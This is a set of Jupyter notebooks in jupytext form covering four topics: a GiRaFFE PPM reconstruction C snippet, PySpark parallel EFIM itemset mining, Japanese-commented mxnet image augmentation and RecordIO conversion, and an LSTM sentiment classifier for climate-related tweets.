# More rigorous definitions of "Too Close" and "Farther Away" are derived from parabolas with vertices on the interfaces, as can be seen in the code below:
# +
# %%writefile -a $outdir/reconstruct_set_of_prims_PPM_GRFFE.C
static inline void monotonize(const REAL U,REAL &Ur,REAL &Ul) {
const REAL dU = Ur - Ul;
const REAL mU = 0.5*(Ur+Ul);
if ( (Ur-U)*(U-Ul) <= 0.0) {
Ur = U;
Ul = U;
return;
}
if ( dU*(U-mU) > (1.0/6.0)*SQR(dU)) {
Ul = 3.0*U - 2.0*Ur;
return;
}
if ( dU*(U-mU) < -(1.0/6.0)*SQR(dU)) {
Ur = 3.0*U - 2.0*Ul;
return;
}
}
# -
# <a id='latex_pdf_output'></a>
#
# # Step 4: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\]
# $$\label{latex_pdf_output}$$
#
# The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename
# [Tutorial-GiRaFFE_HO_Ccode_library-PPM.pdf](Tutorial-GiRaFFE_HO_Ccode_library-PPM.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.)
# !jupyter nbconvert --to latex --template latex_nrpy_style.tplx Tutorial-GiRaFFE_HO_Ccode_library-PPM.ipynb
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !pdflatex -interaction=batchmode Tutorial-GiRaFFE_HO_Ccode_library-PPM.tex
# !rm -f Tut*.out Tut*.aux Tut*.log
|
notebook/Tutorial-GiRaFFE_HO_Ccode_library-PPM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
from pyspark import SparkContext, SparkConf
from collections import defaultdict
from Transaction import Transaction
from operator import add
from pEFIM import pEFIM
# variables used in the algorithm
APP_NAME = "PEFIM"
conf = SparkConf().setAppName(APP_NAME)
sc = SparkContext(conf=conf)
inputfile = 'thesisDatabase.txt'
numPartitions = 4
minUtil = 50
partitionType = 'lookup'
def buildTransaction(line):
# gets a input line and builds a transaction with the line
line = line.strip().split(':')
items = line[0].strip().split(' ')
items = [int(item) for item in items]
twu = float(line[1])
utilities = line[2].strip().split(' ')
utilities = [float(utility) for utility in utilities]
# creating a transaction
transaction = Transaction(items, utilities, twu)
return transaction
def getFileStats(transactions):
transactionUtilities = transactions.flatMap(lambda x: [x.getTransactionUtility()])
totalutility = transactionUtilities.reduce(add)
datasetLen = len(transactionUtilities.collect())
return {
'len' : datasetLen,
'totalUtility' : totalutility
}
# this function not only revises the transaction but also calculates the NSTU value of each secondary item
def reviseTransactions(transaction):
transaction.removeUnpromisingItems(oldNamesToNewNames_broadcast.value)
return transaction
# calculates the subtree utility of secondary items
def calculateSTUFirstTime(transaction):
# secondary items
secondaryItems = list(oldNamesToNewNames_broadcast.value.keys())
items = transaction.getItems()
utilities = transaction.getUtilities()
itemsUtilityList = []
sumSU = 0
i = len(items) - 1
while i >= 0:
item = items[i]
sumSU += utilities[i]
itemsUtilityList.append((item, sumSU))
i -= 1
return itemsUtilityList
# this function just collects the transaction and prints the items and utilities present in the transaction
def printTransactions(transactions):
for transaction in transactions.collect():
print('transaction start')
print(transaction.getItems())
print(transaction.getUtilities())
print('transaction ends')
# divides the items between the partitions based on certain techniques
def divideItems(items, numPartitions, partitionType):
itemNode = {}
NodeToItemMap = {}
for i in range(numPartitions):
NodeToItemMap[i] = []
if partitionType == 'lookup':
i = 0
inc = 1
flag = False
for item in items:
itemNode[item] = i
NodeToItemMap[i].append(item)
i += inc
if (i == 0) or (i == numPartitions -1):
if flag:
if i == 0:
inc = 1
else:
inc = -1
flag = False
else:
inc = 0
flag = True
for i in range(numPartitions):
NodeToItemMap[i] = set(NodeToItemMap[i])
return itemNode, NodeToItemMap
# +
def defaultBooleanValue():
return False
def mapTransaction(transaction):
items = transaction.getItems()
utilities = transaction.getUtilities()
totalUtility = transaction.getTransactionUtility()
mapItemToNodeID = itemToNodeMap_broadcast.value
mapNodeID = defaultdict(defaultBooleanValue)
transactionList = []
cumulativeUtility = 0
primaryItems = list(mapItemToNodeID.keys())
for idx, item in enumerate(items):
if item not in primaryItems:
cumulativeUtility += utilities[idx]
continue
nodeID = mapItemToNodeID[item]
# if this transaction is not assigned to the node
if not mapNodeID[nodeID]:
# create a new transaction
newTransaction = Transaction(items[idx:], utilities[idx:], totalUtility - cumulativeUtility)
transactionList.append((nodeID, newTransaction))
mapNodeID[nodeID] = True
cumulativeUtility += utilities[idx]
return transactionList
# +
# reading the data from the text file and transorfming each line into a transaction
transactions = sc.textFile(inputfile, numPartitions).map(lambda x : buildTransaction(x))
transactions.persist()
# compute the statistics of the database
filestats = getFileStats(transactions)
# calculate the TWU value for each item present in the database
twuDict = dict(transactions.flatMap(lambda x: [(item, x.getTransactionUtility()) for item in x.getItems()]).reduceByKey(add).filter(lambda x: x[1] >= minUtil).collect())
# the keys in the dictionary are the items which we keep in the database we call them as primary items
secondaryItems = list(twuDict.keys())
# sorting the primary keys in increasing order of their TWU values
secondaryItems.sort(key = lambda x: twuDict[x])
# give new names to the items based upon their ordering starting from 1
oldNamesToNewNames = {} # dictionary for storing the mappings from old names to new names
newNamesToOldNames = {} # dictionary to map from new names to old names
currentName = 1
for idx, item in enumerate(secondaryItems):
oldNamesToNewNames[item] = currentName
newNamesToOldNames[currentName] = item
secondaryItems[idx] = currentName
currentName += 1
# broadcasting the oldNamesToNewNames Dictionary which will be used by the transaction to get the revised transaction
oldNamesToNewNames_broadcast = sc.broadcast(oldNamesToNewNames)
newNamesToOldNames_broadcast = sc.broadcast(newNamesToOldNames)
minUtil_broadcast = sc.broadcast(minUtil)
# Remove non secondary items from each transaction and sort remaining items in increasing order of their TWU values
revisedTransactions = transactions.map(reviseTransactions).filter(lambda x: len(x.getItems()) > 0)
revisedTransactions.persist()
transactions.unpersist()
# Calculate the subtree utility of each item in secondary item
STU_dict = dict(revisedTransactions.flatMap(calculateSTUFirstTime).reduceByKey(add).filter(lambda x: x[1] >= minUtil).collect())
# primary items or the items which need to be projected in DFS traversal of the search space
primaryItems = list(STU_dict.keys())
primaryItems.sort(key= lambda x: twuDict[newNamesToOldNames[x]])
itemToNodeMap, nodeToItemsMap = divideItems(primaryItems, numPartitions, partitionType)
itemToNodeMap_broadcast = sc.broadcast(itemToNodeMap)
nodeToItemsMap_broadcast = sc.broadcast(dict(nodeToItemsMap))
# creating a new key-value RDD where key is node id and value is list of transactions at that node id
partitionTransactions = revisedTransactions.flatMap(mapTransaction).groupByKey().mapValues(list)
partitionTransactions.persist()
revisedTransactions.unpersist()
# repartition the data into nodes depending upon the key
# # transactions = transactions.partitionBy(numPartitions, lambda k: int(k[0]))
# # partitioner = RangePartitioner(numPartitions)
# +
def parllelEFIM(nodeData):
currNode = nodeData[0]
transactions = nodeData[1]
primaryItems = nodeToItemsMap_broadcast.value
primaryItems = primaryItems[currNode]
minUtil = minUtil_broadcast.value
oldNamesToNewNames = oldNamesToNewNames_broadcast.value
newNamesToOldNames = newNamesToOldNames_broadcast.value
secondaryItems = list(newNamesToOldNames.keys())
pefim = pEFIM(minUtil, primaryItems, secondaryItems, transactions, newNamesToOldNames, oldNamesToNewNames)
output = pefim.runAlgo()
return output
def output(itemsets, file):
with open(file, 'w') as f:
for itemset in itemsets:
f.write("itemset : " + str(itemset[1]))
f.write(" utility : " + str(itemset[0]))
f.write("\n")
f.close()
# +
# for idx, transaction in enumerate(partitionTransactions.collect()):
# if idx == 1:
# parllelEFIM(transaction)
huis = partitionTransactions.map(parllelEFIM).groupByKey().map(lambda x : (x[0], list(x[1]))).collect()
# -
itemsets = [y for x in huis[0][1] if len(x) > 0 for y in x]
print(len(itemsets))
output(itemsets, 'out.txt')
|
mainEFIM.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: conda_mxnet_p36
# language: python
# name: conda_mxnet_p36
# ---
# # 教師データ(画像とlst形式のメタデータ)を増幅させて、RecodIOファイルに変換
# ## 必要なモジュールをインストール
# !pip install imgaug tqdm
# ## 複数の教師データをマージする
#
# 複数のlstファイルと画像ファイルをマージする。
# その際に、画像は指定したサイズの正方形へとリサイズする。
# lstファイルは[mxnetの物体検出用のフォーマット](https://mxnet.incubator.apache.org/api/python/image/image.html)(ヘッダーサイズが2で一つのラベルデータの数は5、エクストラヘッダーは無し)を想定。
#
# +
# lstファイルのパス
lst_path_list = ['path/to/lst1', 'path/to/lst2']
# 画像ファイルの位置(順序はlstファイルと対応づける)
img_root_path_list = ['path/to/lst1', 'path/to/lst2']
# 読み込んだlstファイルをマージしたもの出力先ルート
merged_root_path = './data/merged'
# 画像サイズ(変換後の画像サイズ: img_edge_size * img_edge_size)
img_edge_size = 512
# -
# ### 関数定義
#
# +
def create_lst(file_path, index, label_data):
"""
lst形式のデータ(文字列)を作成
"""
header_size = 2
label_width = 5
return '\t'.join([
str(index),
str(header_size),
str(label_width),
'\t'.join(label_data),
file_path])
def read_lst(dat):
"""
lst形式のデータ(文字列)の内容を読み込む
"""
dat_list = dat.split('\t')
index = int(dat_list[0])
header_size = int(dat_list[1])
assert header_size == 2, 'header_sizeは2を想定:'+str(header_size)
label_width = int(dat_list[2])
assert label_width == 5, 'label_widthは5を想定: '+str(label_width)
label_data = dat_list[3:-1]
assert (len(label_data) % label_width) == 0 , 'label_dataの長さはlabel_widthの倍数のはず : '
file_path = dat_list[-1]
return (index, header_size, label_width, label_data, file_path)
# -
# ### 処理
# +
import os
from os import path
import shutil
from PIL import Image
from tqdm import tqdm
assert len(lst_path_list) == len(img_root_path_list), "lst_path_listとimg_root_path_listの長さは同じのはず"
#マージしたlstファイルと画像ファイルの出力先
output_lst_path = path.join(merged_root_path, "lst.lst")
output_img_root_path = path.join(merged_root_path, "img")
# 出力先をリセット
if path.isdir(merged_root_path):
shutil.rmtree(merged_root_path)
os.makedirs(merged_root_path)
os.makedirs(output_img_root_path)
# マージ処理開始
merged_lst = []
for lst_path, img_root_path in tqdm(zip(lst_path_list, img_root_path_list)):
with open(lst_path) as lst_f:
for line in tqdm(lst_f.readlines()):
line = line.strip()
if not line: continue
#lst形式のデータを読み取って、変数に入れる
index, header_size, label_width, label_data, img_path = read_lst(line)
img_path = path.join(img_root_path, img_path)
merged_index = len(merged_lst) + 1
# 画像ファイル名をcountに書き換える
after_img_name = str(merged_index) + path.splitext(img_path)[1]
after_img_path = path.join(output_img_root_path, after_img_name)
#マージ後ファイル出力先へ画像をコピー
img = Image.open(img_path)
# 余白は黒(0,0,0)にして正方形の画像に変換し、その後指定したサイズへ変換
img.thumbnail((img_edge_size, img_edge_size))
img.save(after_img_path)
#lst形式のテキストを作成
lst_dat = create_lst(after_img_name, merged_index, label_data)
merged_lst.append(lst_dat)
# 作成したデータを要素ごとに改行して書き出す
with open(output_lst_path, 'w') as out_f:
out_f.write('\n'.join(merged_lst))
# -
# # 教師データを増幅
# データを検証用と学習用に分割し、それぞれのデータを[imgaug](https://github.com/aleju/imgaug)を使って増幅させる。
# 処理終了後、検証用と学習用それぞれのデータ数を表示。
# +
# 検証用データの割合 0の場合は学習データのみ作成
validate_ratio = 0.2
#読み込むlstファイル
lst_path = output_lst_path
img_root_path = output_img_root_path
# 読み込んだlstファイルをマージしたもの出力先ルート
augmented_root_path = './data/augmented'
# -
# ### 画像増幅処理の定義
# `augs`に定義された処理が実行されます。
# 必要に応じて`augs`や`aug_templates`を変更する。
# +
import numpy as np
import math
from PIL import Image
from scipy import misc
import imgaug as ia
from imgaug import augmenters as iaa
from matplotlib import pyplot as plt
# シードを固定
ia.seed(1)
# 画像増幅のためのaugmentorを定義(必要に応じて変える)
aug_templates = [
iaa.Invert(1, per_channel=0.5), # 各ピクセルの値を反転させる
iaa.CoarseDropout((0.03, 0.15), size_percent=(0.02, 0.25)), #ところどころ欠落させる
iaa.CoarseDropout((0.03, 0.15), size_percent=0.02, per_channel=0.8), # ところどころ色を変える
iaa.CoarseSaltAndPepper(0.2, size_percent=(0.05, 0.1)), # 白と黒のノイズ
iaa.WithChannels(0, iaa.Affine(rotate=(0,10))), # 赤い値を傾ける
iaa.FrequencyNoiseAlpha( # 決まった形のノイズを加える
first=iaa.EdgeDetect(1),
per_channel=0.5
),
iaa.ElasticTransformation(sigma=0.5, alpha=1.0), # モザイクをかける
iaa.AddToHueAndSaturation(value=25), # 色調と彩度に値を追加
iaa.Emboss(alpha=1.0, strength=1.5), # 浮き出し加工
iaa.Superpixels(n_segments=100, p_replace=0.5), # superpixel表現にして、各セル内を一定確率でセルの平均値で上書きする
iaa.Fliplr(1.0),
iaa.Flipud(1.0)
]
# 実行する画像増幅処理一覧(必要に応じて変える)
augs = [
iaa.Noop(), # 無変換
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(1, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(2, aug_templates),
iaa.SomeOf(3, aug_templates)
]
# -
# ### 処理定義
# +
import random
import copy
assert validate_ratio < 1.0, "validate_ratio は1以下のはず" + str(validate_ratio)
#マージしたlstファイルと画像ファイルの出力先
train_augmented_lst_path = path.join(augmented_root_path, "train.lst")
train_augmented_img_root_path = path.join(augmented_root_path, "train")
val_augmented_lst_path = path.join(augmented_root_path, "val.lst")
val_augmented_img_root_path = path.join(augmented_root_path, "val")
# 出力先をリセット
if path.isdir(augmented_root_path):
shutil.rmtree(augmented_root_path)
os.makedirs(augmented_root_path)
os.makedirs(train_augmented_img_root_path)
os.makedirs(val_augmented_img_root_path)
train_augmented_lst = []
val_augmented_lst = []
with open(lst_path) as lst_f:
for line in tqdm(lst_f.readlines()):
line = line.strip()
if not line: continue
#lst形式のデータを読み取って、変数に入れる
origin_img_index, header_size, label_width, label_data, img_path = read_lst(line)
img_path = path.join(img_root_path, img_path)
# 画像を読み込む
target_img = np.array(Image.open(img_path))
# バウンディングボックスを生成
img_height = target_img.shape[0]
img_width = target_img.shape[1]
bbs = []
for bb_index in range(len(label_data)//label_width):
bbs.append(ia.BoundingBox(
x1 = float(label_data[bb_index * label_width + 1]) * img_width,
y1 = float(label_data[bb_index * label_width + 2]) * img_height,
x2 = float(label_data[bb_index * label_width + 3]) * img_width,
y2 = float(label_data[bb_index * label_width + 4]) * img_height
))
bbs_on_img = ia.BoundingBoxesOnImage(bbs, shape = target_img.shape)
# 指定した確率で検証用データとして割り当てる
if random.random() < validate_ratio:
augmented_lst = val_augmented_lst
augmented_img_root_path = val_augmented_img_root_path
else:
augmented_lst = train_augmented_lst
augmented_img_root_path = train_augmented_img_root_path
#画像
aug_num = len(augs)
for aug_index, aug in enumerate(augs):
# augmentorの変換方法を固定する(画像とバウンディングボックスそれぞれに対する変換方法を変えないようにするため)
aug = aug.to_deterministic()
#画像増幅する
aug_img = aug.augment_image(target_img)
aug_bbs = aug.augment_bounding_boxes([bbs_on_img])[0]
image_index = len(augmented_lst) + 1
# 増幅した画像ファイル名
after_img_name = "{0:05d}_{1:03d}{2}".format(origin_img_index, aug_index+1, path.splitext(img_path)[1])
after_img_path = path.join(augmented_img_root_path, after_img_name)
# 増幅した画像を保存
Image.fromarray(aug_img).save(after_img_path)
# ラベルデータを上書き
aug_label_data = copy.deepcopy(label_data)
for bb_index in range(len(label_data)//label_width):
aug_label_data[bb_index * label_width + 1] = str(aug_bbs.bounding_boxes[bb_index].x1 / img_width)
aug_label_data[bb_index * label_width + 2] = str(aug_bbs.bounding_boxes[bb_index].y1 / img_height)
aug_label_data[bb_index * label_width + 3] = str(aug_bbs.bounding_boxes[bb_index].x2 / img_width)
aug_label_data[bb_index * label_width + 4] = str(aug_bbs.bounding_boxes[bb_index].y2 / img_height)
# 増幅画像用のlst形式のテキストを作成
lst_dat = create_lst(after_img_name, image_index, aug_label_data)
augmented_lst.append(lst_dat)
# 作成したデータを要素ごとに改行して書き出す
with open(train_augmented_lst_path, 'w') as out_f:
out_f.write('\n'.join(train_augmented_lst))
if len(val_augmented_lst) > 0:
with open(val_augmented_lst_path, 'w') as out_f:
out_f.write('\n'.join(val_augmented_lst))
print("train data: ",len(train_augmented_lst))
print("validation data: ", len(val_augmented_lst))
# -
# # RecordIO形式に変換
# +
import os
import urllib.request
def download(url):
filename = url.split("/")[-1]
if not os.path.exists(filename):
urllib.request.urlretrieve(url, filename)
# Tool for creating lst file
download('https://raw.githubusercontent.com/apache/incubator-mxnet/master/tools/im2rec.py')
# -
# !python im2rec.py ./data/augmented/train.lst ./data/augmented/train/ --num-thread 4 --pack-label
# !python im2rec.py ./data/augmented/val.lst ./data/augmented/val/ --num-thread 4 --pack-label
|
image/augment_image_base.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import pickle
import json
import gensim
import os
import re
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix
from pandas.plotting import scatter_matrix
from keras.models import load_model
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing import sequence
from keras.optimizers import RMSprop, SGD
from keras.models import Sequential, Model
from keras.layers.core import Dense, Dropout, Activation, Flatten, Reshape
from keras.layers import Input, Bidirectional, LSTM, regularizers
from keras.layers.embeddings import Embedding
from keras.layers.convolutional import Conv1D, MaxPooling1D, MaxPooling2D, Conv2D
from keras.layers.normalization import BatchNormalization
from keras.callbacks import EarlyStopping
# %matplotlib inline
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
# -
filename = '../wyns/data/tweet_global_warming.csv'
df = pd.read_csv(filename, encoding='latin')
df.head()
model_path = "GoogleNews-vectors-negative300.bin"
word_vector_model = gensim.models.KeyedVectors.load_word2vec_format(model_path, binary=True)
def normalize(txt, vocab=None, replace_char=' ',
max_length=300, pad_out=False,
to_lower=True, reverse = False,
truncate_left=False, encoding=None,
letters_only=False):
txt = txt.split()
# Remove HTML
# This will keep characters and other symbols
txt = [re.sub(r'http:.*', '', r) for r in txt]
txt = [re.sub(r'https:.*', '', r) for r in txt]
txt = ( " ".join(txt))
# Remove non-emoticon punctuation and numbers
txt = re.sub("[.,!0-9]", " ", txt)
if letters_only:
txt = re.sub("[^a-zA-Z]", " ", txt)
txt = " ".join(txt.split())
# store length for multiple comparisons
txt_len = len(txt)
if truncate_left:
txt = txt[-max_length:]
else:
txt = txt[:max_length]
# change case
if to_lower:
txt = txt.lower()
# Reverse order
if reverse:
txt = txt[::-1]
# replace chars
if vocab is not None:
txt = ''.join([c if c in vocab else replace_char for c in txt])
# re-encode text
if encoding is not None:
txt = txt.encode(encoding, errors="ignore")
# pad out if needed
if pad_out and max_length>txt_len:
txt = txt + replace_char * (max_length - txt_len)
if txt.find('@') > -1:
for i in range(len(txt.split('@'))-1):
try:
if str(txt.split('@')[1]).find(' ') > -1:
to_remove = '@' + str(txt.split('@')[1].split(' ')[0]) + " "
else:
to_remove = '@' + str(txt.split('@')[1])
txt = txt.replace(to_remove,'')
except:
pass
return txt
def balance(df):
print("Balancing the classes")
type_counts = df['Sentiment'].value_counts()
min_count = min(type_counts.values)
balanced_df = None
for key in type_counts.keys():
df_sub = df[df['Sentiment']==key].sample(n=min_count, replace=False)
if balanced_df is not None:
balanced_df = balanced_df.append(df_sub)
else:
balanced_df = df_sub
return balanced_df
# +
def tweet_to_sentiment(tweet):
norm_text = normalize(tweet[0])
if tweet[1] in ('Yes', 'Y'):
return ['positive', norm_text]
elif tweet[1] in ('No', 'N'):
return ['negative', norm_text]
else:
return ['other', norm_text]
df = pd.read_csv(filename, encoding='latin')
data = []
for index, row in df.iterrows():
data.append(tweet_to_sentiment(row))
twitter = pd.DataFrame(data, columns=['Sentiment', 'clean_text'], dtype=str)
# -
# For this demo lets just keep one and five stars the others are marked 'other
# twitter = twitter[twitter['Sentiment'].isin(['positive', 'negative'])]
twitter.head()
print(len(twitter))
# twitter['Sentiment'].unique()
pd.options.display.max_colwidth = 300
print(twitter.loc[0])
# +
#Run this cell to balance training data
# twitter = balance(twitter)
# len(twitter)
# -
# Now go from the pandas into lists of text and labels
text = twitter['clean_text'].values
labels_0 = pd.get_dummies(twitter['Sentiment']) # mapping of the labels with dummies (has headers)
# print(labels_0[:10], twitter['Sentiment'].iloc[:10])
# labels = labels_0.values
labels = labels_0.values[:,[0,2]] # removes the headers
print(labels)
# Perform the Train/test split
X_train_, X_test_, Y_train_, Y_test_ = train_test_split(text,labels, test_size = 0.2, random_state = 42)
print(labels_0)
Y_test = []
xt = []
for i in range(Y_test_.shape[0]):
if Y_test_[i].mean() > 0:
Y_test.append(Y_test_[i])
xt.append(X_test[i])
Y_test = np.array(Y_test)
xt = np.array(xt)
print(Y_test_.shape, Y_test.shape)
# print(Y_train_[:,0].mean(), Y_train_[:,1].mean())
from sklearn.utils import class_weight
class_weights = class_weight.compute_class_weight('balanced',
np.unique(Y_train_),
Y_train_)
print(class_weights)
# +
### Now for a simple bidirectional LSTM algorithm we set our feature sizes and train a tokenizer
# First we Tokenize and get the data into a form that the model can read - this is BoW
# In this cell we are also going to define some of our hyperparameters
max_fatures = 2000
max_len = 2000
words_len = 30
batch_size = 32
embed_dim = 300
lstm_out = 140
dense_out=len(labels[0]) #length of features
tokenizer = Tokenizer(num_words=max_fatures, split=' ')
tokenizer.fit_on_texts(X_train_)
X_train = tokenizer.texts_to_sequences(X_train_)
X_train = pad_sequences(X_train, maxlen=words_len, padding='post')
print(X_train[:,-1].mean())
X_test = tokenizer.texts_to_sequences(X_test_)
X_test = pad_sequences(X_test, maxlen=words_len, padding='post')
word_index = tokenizer.word_index
# print(len(word_index))
# +
# prepare embedding matrix
num_words = min(max_fatures, len(word_index))
embedding_matrix = np.zeros((num_words, embed_dim))
for word, i in word_index.items():
if i >= max_len:
# print(i)
continue
# words not found in embedding index will be all-zeros.
if word in word_vector_model.vocab:
embedding_matrix[i] = word_vector_model.word_vec(word)
# load pre-trained word embeddings into an Embedding layer
# note that we set trainable = True to fine tune the embeddings
embedding_layer = Embedding(num_words,
embed_dim,
weights=[embedding_matrix],
input_length=max_fatures,
trainable=False)
# +
# Define the model using the pre-trained embedding
# import keras
sequence_input = Input(shape=(words_len,), dtype='int32')
# gbm_input = Input(shape=(Y_train_.shape[1],), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
# embedded_sequences = keras.layers.concatenate([gbm_input,embedding_layer(sequence_input)],axis=1)
x = Bidirectional(LSTM(lstm_out, recurrent_dropout=0.5, activation='tanh'))(embedded_sequences)
# x = Bidirectional(LSTM(lstm_out, recurrent_dropout=0.5, activation='tanh'))(x)
x = Dense(250, activation='elu')(x)
preds = Dense(dense_out, activation='softmax')(x)
model = Model([sequence_input], preds)
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['acc'])
print(model.summary())
# -
model_hist_embedding = model.fit(X_train, Y_train_, epochs = 20, batch_size=batch_size, verbose = 2,
class_weight = [1/Y_train_[:,0].mean(), 1/Y_train_[:,1].mean()],validation_data=(xt,Y_test))
# +
def acc(y,y_):
score = 0
for i in range(y.shape[0]):
if np.argmax(y[i]) == np.argmax(y_[i]):
score+=1
score = score / y.shape[0]
return score
pp = model.predict(xt)
print(acc(Y_test,pp))
# -
# train a gradient boosted machine
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.multioutput import MultiOutputClassifier
gbm = GradientBoostingClassifier(n_estimators = 5000)
mo = MultiOutputClassifier(gbm, n_jobs = -1)
mo.fit(X_train,Y_train_)
# +
# print(mo.score(xt,Y_test))
# print(mo.score(X_train,Y_train_))
# predd = mo.predict(X_train)
# pred_test = mo.predict(Y_test)
# +
# print(embedding_matrix)
# -
model_hist_embedding = model.fit(X_train, Y_train_, epochs = 20, batch_size=batch_size, verbose = 2,
validation_data=(X_test,Y_test_))
confusion_matrix(Y_test[:,1], np.round(model.predict(xt))[:,1])
# Training Accuracy
x = np.arange(20)+1
fig=plt.figure(dpi=300)
ax = fig.add_subplot(111)
ax.plot(x, model_hist_embedding.history['acc'])
ax.plot(x, model_hist_embedding.history['val_acc'])
ax.legend(['Training', 'Testing'], loc='lower right')
plt.ylabel("Accuracy")
axes = plt.gca()
axes.set_ylim([0.45,1.01])
plt.xlabel("Epoch")
plt.title("LSTM Accuracy")
plt.show()
fig.savefig(fname='03.png', bbox_inches='tight', format='png')
# model_hist_embedding.model.save("../wyns/data/climate_sentiment_m6.h5")
# m6 is nans included in the training set but removed from test set, where a nan is [0,0] for [for, against]
model = load_model("../wyns/data/climate_sentiment_m6.h5")
# +
# model = model_hist_embedding.model
# +
def tweet_to_sentiment(tweet):
# Review is coming in as Y/N/NaN
# this then cleans the summary and review and gives it a positive or negative value
norm_text = normalize(tweet[0])
if tweet[1] in ('Yes', 'Y'):
return ['positive', norm_text]
elif tweet[1] in ('No', 'N'):
return ['negative', norm_text]
else:
return ['other', norm_text]
def clean_tweet(tweet):
norm_text = normalize(tweet[0])
return [tweet[1], tweet[2], norm_text, tweet[3], tweet[4], tweet[5], tweet[0]]
# -
df = pd.read_csv("../wyns/data/tweets.txt", delimiter="~~n~~", engine="python")
df.head()
data = []
for index, row in df.iterrows():
data.append(clean_tweet(row))
twitter = pd.DataFrame(data, columns=['long', 'lat', 'clean_text', 'time', 'retweets', 'location','raw_text'], dtype=str)
to_predict_ = twitter['clean_text'].values
# +
### Now for a simple bidirectional LSTM algorithm we set our feature sizes and train a tokenizer
# First we Tokenize and get the data into a form that the model can read - this is BoW
# In this cell we are also going to define some of our hyperparameters
max_fatures = 2000
max_len=30
batch_size = 32
embed_dim = 300
lstm_out = 140
dense_out=len(labels[0]) #length of features
tokenizer = Tokenizer(num_words=max_fatures, split=' ')
tokenizer.fit_on_texts(to_predict_)
to_predict = tokenizer.texts_to_sequences(to_predict_)
to_predict = pad_sequences(to_predict, maxlen=max_len, padding='post')
word_index = tokenizer.word_index
# -
predictions = model.predict(to_predict)
print("negative predictions: {}".format(sum(np.round(predictions)[:,0])))
print("positive predictions: {}".format(sum(np.round(predictions)[:,1])))
df_out = pd.DataFrame([twitter['long'], twitter['lat'], twitter['clean_text'],
twitter['time'], twitter['retweets'], twitter['location'], predictions[:,0], predictions[:,1]]).T
df_out = df_out.rename(index=str, columns={"Unnamed 0": "negative", "Unnamed 1": "positive"})
print(df_out.shape)
df_out.head()
df_out.to_csv("sample_prediction.csv", index=False)
import re
new_lines = []
for i in df_out['clean_text']:
raw = i.split(" ")
out = ""
count=0
for j in raw:
if count < 6:
out += j + " "
count += 1
else:
out += j + "\n"
count = 0
new_lines.append(out)
df_out['new_lines'] = pd.Series(new_lines)
# print(new_lines)
# print(re.sub('( [^ ][^ ][^ ]*),', r'\1 ', i))
df_out.head()
len(df_out)
|
examples/w2v_lstm_model-Copy1.ipynb
|